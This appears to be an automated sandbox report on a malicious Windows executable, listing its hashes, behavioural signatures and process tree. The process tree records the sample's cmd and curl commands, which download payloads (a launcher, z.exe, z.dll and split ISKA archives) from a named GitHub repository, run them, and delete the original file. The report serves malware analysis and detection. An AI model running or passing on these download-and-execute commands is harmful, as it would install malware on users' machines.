Analysis

  • max time kernel
    119s
  • max time network
    121s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23/08/2024, 13:37

General

  • Target

    2d3384ff117bd91e1d2efda9deede540N.exe

  • Size

    1.2MB

  • MD5

    2d3384ff117bd91e1d2efda9deede540

  • SHA1

    155a7f799c3442da467754c95ef2524d5a6969b1

  • SHA256

    0c53c6891733c2e3c70baf93e4da635aa25cc18b984ef619cbcc2d7c8960079f

  • SHA512

    6a07a17f508425b7bcd10f16242ee3e3ab8ec5e553cfb72fef3e450bd66dae20de8b7dac2a204d233bf463e36e430bc9f1f593fb12938d8d0eb3f3c9369dec7d

  • SSDEEP

    24576:ErORE29TTVx8aBRd1h1orq+GWE0Jc5bDTj1Vyv9TvaZZlMF4:E2EYTb8atv1orq+pEiSDTj1VyvBa1M

Score
8/10

Malware Config

Signatures

  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2d3384ff117bd91e1d2efda9deede540N.exe
    "C:\Users\Admin\AppData\Local\Temp\2d3384ff117bd91e1d2efda9deede540N.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1392
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/TROguz/ndx/main/pc --ssl-no-revoke -o ndx
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3080
      • C:\Windows\system32\curl.exe
        curl https://raw.githubusercontent.com/TROguz/ndx/main/pc --ssl-no-revoke -o ndx
        3⤵
          PID:4384
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c del ndx
        2⤵
          PID:3144
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c del
          2⤵
            PID:5064
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/TROguz/ndx/main/RewAdIs_Launcher_v08.exe --ssl-no-revoke -o RewAdIs_Launcher_v08.exe
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:5016
            • C:\Windows\system32\curl.exe
              curl https://raw.githubusercontent.com/TROguz/ndx/main/RewAdIs_Launcher_v08.exe --ssl-no-revoke -o RewAdIs_Launcher_v08.exe
              3⤵
                PID:3484
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c RewAdIs_Launcher_v08.exe
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:4820
              • C:\Users\Admin\AppData\Local\Temp\RewAdIs_Launcher_v08.exe
                RewAdIs_Launcher_v08.exe
                3⤵
                • Executes dropped EXE
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                • Suspicious use of WriteProcessMemory
                PID:4208
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/TROguz/ndx/main/pc --ssl-no-revoke -o ndx
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4832
                  • C:\Windows\system32\curl.exe
                    curl https://raw.githubusercontent.com/TROguz/ndx/main/pc --ssl-no-revoke -o ndx
                    5⤵
                      PID:4744
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c del ndx
                    4⤵
                      PID:5092
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c del 2d3384ff117bd91e1d2efda9deede540N.exe
                      4⤵
                        PID:3968
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c curl --ssl-no-revoke -O https://raw.githubusercontent.com/TROguz/ndx/{main/z.exe,main/z.dll}
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4556
                        • C:\Windows\system32\curl.exe
                          curl --ssl-no-revoke -O https://raw.githubusercontent.com/TROguz/ndx/{main/z.exe,main/z.dll}
                          5⤵
                            PID:2680
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c curl --ssl-no-revoke -O https://raw.githubusercontent.com/TROguz/ndx/{main/ISKA.7z.001,main/ISKA.7z.002}
                          4⤵
                          • Suspicious use of WriteProcessMemory
                          PID:5048
                          • C:\Windows\system32\curl.exe
                            curl --ssl-no-revoke -O https://raw.githubusercontent.com/TROguz/ndx/{main/ISKA.7z.001,main/ISKA.7z.002}
                            5⤵
                              PID:1792

                    Network

                    MITRE ATT&CK Enterprise v15

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Users\Admin\AppData\Local\Microsoft\ISKA\u

                      Filesize

                      63B

                      MD5

                      b57cd2f14edb7fe9e984e27c204f76a5

                      SHA1

                      e949c42c36539e2cce8a1ea55ed094b345fcfee6

                      SHA256

                      07ff7e593852214d9a284a4434cda9e0b63bb32f966657948395d04f8143b5e5

                      SHA512

                      a78245e3c68dfa68598955516214a5cc64976f6f902f0dd768c26c2d860e7cb139b34bb7d1117d89c1a51b59ffc3175b3077f32821ac35320a5175228a147c49

                    • C:\Users\Admin\AppData\Local\Microsoft\ndx

                      Filesize

                      27KB

                      MD5

                      494eff8bdaa7322ad7ecf159d8feede1

                      SHA1

                      ceaacc7452d910065af126872a091efe93e88b1d

                      SHA256

                      fc27524bb6f93c05f3d5e161794f3732d1411c6150c143c2abeb1485208a46a5

                      SHA512

                      4f4f1299232a452df3205cdf98aa0e77c9fd0f77be57175b18a2abbe78dec4efb386b6c10e0d55f66dad81c1a1472d67e3156260ff85edca158814961b3af095

                    • C:\Users\Admin\AppData\Local\Microsoft\pcsw

                      Filesize

                      2B

                      MD5

                      88dba0c4e2af76447df43d1e31331a3d

                      SHA1

                      36f780fdbda5b2b2ce85c9ebb57086d1880ae757

                      SHA256

                      21d017c40a91c15748f0b98cd826ba445d2d3fe227e310bfd58dcb6c431826a0

                      SHA512

                      4c34894f42b47ee156997e54e03425f820a3aad6fe8c863d4a07b57c168e846db1a31d1230cec16643b9f1219c38e91331558842dd24a142fee381e465b751ce

                    • C:\Users\Admin\AppData\Local\Temp\RewAdIs_Launcher_v08.exe

                      Filesize

                      1.3MB

                      MD5

                      ad28c9e121bc41ccc97abf25b9f3fd6a

                      SHA1

                      9f5ee915a6fb5adec222ac7d8e61f56d63f9d7c6

                      SHA256

                      d09687fc091b741211f3f9341efd189f1277036f86de1b68d8823eb701da6022

                      SHA512

                      59395025683308a623114b75bf642179335d24de22b94aa4dc89feabb88b70ebb2fc794c6c7f43c3d4fe0ba7f42f29c954c22048b07180c90cb54c88921240b5